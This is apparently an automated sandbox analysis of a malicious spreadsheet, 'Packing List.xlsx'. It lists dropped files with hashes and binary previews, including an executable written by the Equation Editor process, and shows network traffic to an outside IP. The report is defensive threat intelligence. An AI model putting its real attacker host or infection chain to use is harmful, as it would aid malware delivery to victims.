          Preview: ....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Z$.......f.Z.@\.%.............L.....RQ.[L..D.........0..$Q.[L..D.. ...Id.ZD..L.. ............d.Z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...D..x...8.Z........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5268BA6B.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 838 x 469, 8-bit colormap, non-interlaced
          Category:dropped
          Size (bytes):21987
          Entropy (8bit):7.952828365949915
          Encrypted:false
          SSDEEP:384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
          MD5:5A25F525D9F0D658AF52A4F78FE031D4
          SHA1:525FB63F75E745FBC90E4E42E624E030C5DF94EB
          SHA-256:D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
          SHA-512:FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: .PNG........IHDR...F................PLTE...0.....T[c..........................f..................9.....d.........k9u....b...........9....f..kr............t.......e.......9....]X........./.;9.................h..........d.<...({...........t_.....................c7..Ga.06?....._..V.....T..............9......e......ee...........f......:;.D."...h..............e...............Q....E.......l..~..t"....D.............................:....9...........T.........^..d9;....iv...09.Z...........................................................................$...ee9h.G..........................................~........................................;<.........`....................99....5..............................................................AL...R.IDATx...`..&.H......-@.n..]A... ..Fn.!`$X..&&..X@$c..dl<.#...PD....$&".1..h.N..Y3..L6.d.$.XFw..;&(a....=.:..Z].].Q....S..;.?...W%.D....1..s.!....4....`{U'.QU........~.e.*....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67EFF2A.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
          Category:dropped
          Size (bytes):83904
          Entropy (8bit):7.986000888791215
          Encrypted:false
          SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
          MD5:9F9A7311810407794A153B7C74AED720
          SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
          SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
          SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: .PNG........IHDR.............oi......IDATx..u|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.*....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v*:.....M......YUe.N....TI.*..]NQ.<..vm....o....|yt:......P..d.]....bE.zr.....*UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6EA2EAB1.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):68702
          Entropy (8bit):7.960564589117156
          Encrypted:false
          SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
          MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
          SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
          SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
          SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
          Malicious:false
          Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\731170FE.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
          Category:dropped
          Size (bytes):85020
          Entropy (8bit):7.2472785111025875
          Encrypted:false
          SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
          MD5:738BDB90A9D8929A5FB2D06775F3336F
          SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
          SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
          SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
          Malicious:false
          Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84D2F0C8.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
          Category:dropped
          Size (bytes):85020
          Entropy (8bit):7.2472785111025875
          Encrypted:false
          SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
          MD5:738BDB90A9D8929A5FB2D06775F3336F
          SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
          SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
          SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
          Malicious:false
          Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9950728D.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 838 x 469, 8-bit colormap, non-interlaced
          Category:dropped
          Size (bytes):21987
          Entropy (8bit):7.952828365949915
          Encrypted:false
          SSDEEP:384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
          MD5:5A25F525D9F0D658AF52A4F78FE031D4
          SHA1:525FB63F75E745FBC90E4E42E624E030C5DF94EB
          SHA-256:D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
          SHA-512:FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
          Malicious:false
          Preview: .PNG........IHDR...F................PLTE...0.....T[c..........................f..................9.....d.........k9u....b...........9....f..kr............t.......e.......9....]X........./.;9.................h..........d.<...({...........t_.....................c7..Ga.06?....._..V.....T..............9......e......ee...........f......:;.D."...h..............e...............Q....E.......l..~..t"....D.............................:....9...........T.........^..d9;....iv...09.Z...........................................................................$...ee9h.G..........................................~........................................;<.........`....................99....5..............................................................AL...R.IDATx...`..&.H......-@.n..]A... ..Fn.!`$X..&&..X@$c..dl<.#...PD....$&".1..h.N..Y3..L6.d.$.XFw..;&(a....=.:..Z].].Q....S..;.?...W%.D....1..s.!....4....`{U'.QU........~.e.*....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C4C845BC.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
          Category:dropped
          Size (bytes):11303
          Entropy (8bit):7.909402464702408
          Encrypted:false
          SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
          MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
          SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
          SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
          SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
          Malicious:false
          Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3B5F0E7.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 550 x 360, 8-bit colormap, non-interlaced
          Category:dropped
          Size (bytes):15625
          Entropy (8bit):7.975433466796902
          Encrypted:false
          SSDEEP:384:3quMy4uOwJYk5DcUWbdfFZBa7Q9bvC78yPelujgXolFo:6Zk5DcU+FXhavB/lFo
          MD5:79996F390643F9E11F14334A3740FA5E
          SHA1:3A99EC9B5E2057264FFE629D3ABA182912EDB80E
          SHA-256:406EE07DA7DEB2B38B87074EA55980BFE3FEFBD57E50AE7D25502D67A711B15C
          SHA-512:BDD3DB6E24418C0F8B74D79F3B0DDFFAF96A5CD2ABE0D45AEEC5E53EA17B0AD17B239C26781FD5BE34CAC3582F24773BF3FEF0616F6BE024117C1A2DB9A3F0B2
          Malicious:false
          Preview: .PNG........IHDR...&...h.....T......bPLTE..."...P........{......P]............Fx....]..i..bb...,...........K.....................}..........=.....3.....srs...k.....QPR.~.........es.??@...keb"u.]\]x..1h......td..{.....**,...A..odz.....*Q..qAXf............>............u...hXr.y......MTx......R..l..........................K8V%[......=.9nwQT..9.........._=..>.y.^LA.(...R.....;bIDATx..X.o.@.....G..E...6,F.M..T...UZ,!Y!...fIH(........h.?.k..x...%....P...D!...L..2).....G..c.d.+......&:.+........OQ..._..T......%>......e%4.fR......t.3..w..$Xp.6........L..=.vu.X..6......*.W.G.4..Y.c.*...2c....|i....#...~_.Z.66}....l.\...... .L|..zk.G.."..)8. .&&....SN(.7...W...m_ J...<<..$..k.B.F...Q....hs.2!I.s..T...7e4D....E...c.bDl!...C.....t#...*p7.U.#t...32......uy;.....j'.j.#.G.C.. Z...(V.j.#|..b...o.....R=....t.0Wf.r..?..c..R..9.........i.j.y[...A.c.F.uO.M.j...&.q..9T..k.-.+.<.zZ.<...6..rT..W..]..St._....h5^..2.3F.....r~+.8z.......+..[<..._.8...8v....`.o
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D937B123.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):68702
          Entropy (8bit):7.960564589117156
          Encrypted:false
          SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
          MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
          SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
          SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
          SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
          Malicious:false
          Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
          C:\Users\user\AppData\Local\Temp\dobvw7pi71yxrkawv
          Process:C:\Users\Public\vbc.exe
          File Type:data
          Category:dropped
          Size (bytes):208895
          Entropy (8bit):7.98543476844833
          Encrypted:false
          SSDEEP:3072:v4b9C1Ilb0lpljlxjlllllllllllllllpElEa8ObNxMizWQc7ibsalh2yyXDUwC7:+kjZObEVQNZlh2VoD6ghTFrj5eM
          MD5:C18BE7539F4915669E9EA3DAA057DDCF
          SHA1:DF46D7153A977EF06D55F6BF79E9641CC166734E
          SHA-256:6B780DFC77A0F9894AEBF1322FB264C1B1E58E5A006543C7493CB7879B8F2231
          SHA-512:92E4E7A8B890418B829F1A4DD643980A21EC7755CC8A7DD5E96593FE43870288616AE3E5CB1F12B16C18824C09BA7F1E9D577A0247163BD05975D782F6E6B460
          Malicious:false
          Preview: $T......u.B.L..{A.x..<.+............f..i......!...~.....l.N.. ..sZ....T.C..r..@z..7..z..uQ..+..7;....1..wP.R..........r..<2.......M.._.;..hn,k.........m.g....p.........y...R.Lk..c...}~.%.:J.Sk..$.8..b..6{.DvQC.3X8....z.F.a....b.@v.".BwF.`..M.l.......cJ..{.x..<)..Jf.m......f....H...C!...~.....l....Z....... e..... ..c^.m..zs.0.&.C......2.b.9..^.bT..........r..<).....t.MM._.;..hn,k...........g....p.........y...R.Lk..]..^}~.%.:J.Sk..$.8..b..6{.DvQC.3X8....z.F.a....b.@v.".. .B`....l..q....f.J^.{.x..<.+j.N.n....}.B..f.qe..G...>!...~....Ml....Z..3... e....t . c^.m..E..0.&zC.<....[.b.9.IV..NV..u....,..r.<2.......M.._.;.Zhn../....A...m.e....p.R.......y...R.Lkl.t~...~.<.:J...7.8..b..6{.DvQC.3X8L...\uL.~...UY.@v.(.B.F.`..m.l.......f.......4..<.+j.N......g....f..i......!.......Ml....Z..).&... ....>t .bc^.m...s...&zC.<....[.b.9..^.b+..........r..<2.......M.._.;..hn,k.........m.g....p.........y...R.Lk..c...}~.%.:J.Sk..$.8..b..6{.DvQC.3X8....
          C:\Users\user\AppData\Local\Temp\nsn3BBA.tmp\oxtrp.dll
          Process:C:\Users\Public\vbc.exe
          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):20992
          Entropy (8bit):6.645655834323537
          Encrypted:false
          SSDEEP:384:nTkovDTYAYG93/Z+OPtBRDslWhbWh8hDzMWVYi68catJsIf:nTbvDTgG931PhlpWqHMirtJs
          MD5:C2C405109B51233DEF2B5BF15FFD2308
          SHA1:14DEBD98B26EDBA7788AAFCAA41F1D32E8FE1CBC
          SHA-256:7E16ED39BA05C887E6D1B470B6CC8DE06FD67ED81FB2DA85F645CFBC643CA154
          SHA-512:1C209D4110DC5295D5BA951CF5A22D62AB1BF65D9B5BF66F4C6A2E8E2F2CFD339F06CDDF6B956D5F9A567EC8206D607753833CE94E14149D5BBC1B596C91B80B
          Malicious:false
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xH..<)j.<)j.<)j...=)j..6n.>)j.5d.=)j..6`.8)j.(Bk./)j.<)k.x)j.wn.=)j.wj.=)j.w..=)j.wh.=)j.Rich<)j.........PE..L.....xa...........!.....$...*...............@............................................@..........................A..H...4C.......p..............................pA...............................................@..0............................text....#.......$.................. ..`.rdata.......@.......(..............@..@.data...$....P.......2..............@....rsrc........p.......L..............@..@.reloc...............N..............@..B........................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Temp\~DF3DF424E48F9DA5FE.TMP
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Temp\~DF60529B904FCF6857.TMP
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Temp\~DF63AE2933B69E3EF1.TMP
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:CDFV2 Encrypted
          Category:dropped
          Size (bytes):451944
          Entropy (8bit):7.98024010518001
          Encrypted:false
          SSDEEP:12288:brdtzdj7T2ZxWRnxyAu27GV72NVVM8wGu2nni:nPzdj7TAWR9u27GkvwZ2ni
          MD5:74C72F37E68BC3A8071467DD12BFAA7F
          SHA1:5DD9599FDE86870F52169A85CFB76020F504E43C
          SHA-256:DE736EAF65C73F1AEF5B09AA639D82E44129AC1300FD5411CAB342E9E33FAF7C
          SHA-512:57E17452A213D2FBFE4C84B80360853068C0EA2A7FD1293B1F05A44B4370BD8E90A565C0D31515AF3183A59A259D6E679DD436D1D17632ABF6E195DA9C3A27BB
          Malicious:false
          Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
          C:\Users\user\AppData\Local\Temp\~DFB3F4E2B4E1F422B3.TMP
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\Desktop\~$Packing List.xlsx
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):165
          Entropy (8bit):1.4377382811115937
          Encrypted:false
          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
          MD5:797869BB881CFBCDAC2064F92B26E46F
          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
          Malicious:true
          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          C:\Users\Public\vbc.exe
          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Category:dropped
          Size (bytes):235529
          Entropy (8bit):7.915461873573666
          Encrypted:false
          SSDEEP:6144:wBlL/c2HMSZ54elOp0S4jfEpGibIsdpwBQ:Ce2HMSZWeO0S4Mh0gS6
          MD5:DF330AB2A2E5AA4AC947315EE3F93992
          SHA1:76B5D1EEE342B47FE58E2136A067712CBD210351
          SHA-256:99A897C5B8F53E1D04E51107C748A4F385B754A852CA6B605559F5B50820A64F
          SHA-512:E65F573D68E8F198024028D553210095173D1551E6074B60D9543977116A0286F75641F4692049A49E6CD03729B001027136419D6CF0C71645E800D5522ED895
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................

          Static File Info

          General

          File type:CDFV2 Encrypted
          Entropy (8bit):7.98024010518001
          TrID:
          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
          File name:Packing List.xlsx
          File size:451944
          MD5:74c72f37e68bc3a8071467dd12bfaa7f
          SHA1:5dd9599fde86870f52169a85cfb76020f504e43c
          SHA256:de736eaf65c73f1aef5b09aa639d82e44129ac1300fd5411cab342e9e33faf7c
          SHA512:57e17452a213d2fbfe4c84b80360853068c0ea2a7fd1293b1f05a44b4370bd8e90a565c0d31515af3183a59a259d6e679dd436d1d17632abf6e195da9c3a27bb
          SSDEEP:12288:brdtzdj7T2ZxWRnxyAu27GV72NVVM8wGu2nni:nPzdj7TAWR9u27GkvwZ2ni
          File Content Preview:........................>......................................................................................................................................................................................................................................

          File Icon

          Icon Hash: e4e2aa8aa4b4bcb4

          Network Behavior

          TCP Packets

          Timestamp                             Source Port  Dest Port  Source IP       Dest IP
          Oct 27, 2021 16:33:29.706020117 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:29.819412947 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:29.819586992 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:29.820317984 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:29.934331894 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:29.934392929 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:29.934432030 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:29.934470892 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:29.934607029 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:29.934632063 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.048571110 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.048635006 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.048814058 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.048844099 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.048872948 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.048896074 CEST  80           49167      192.227.228.38  192.168.2.22
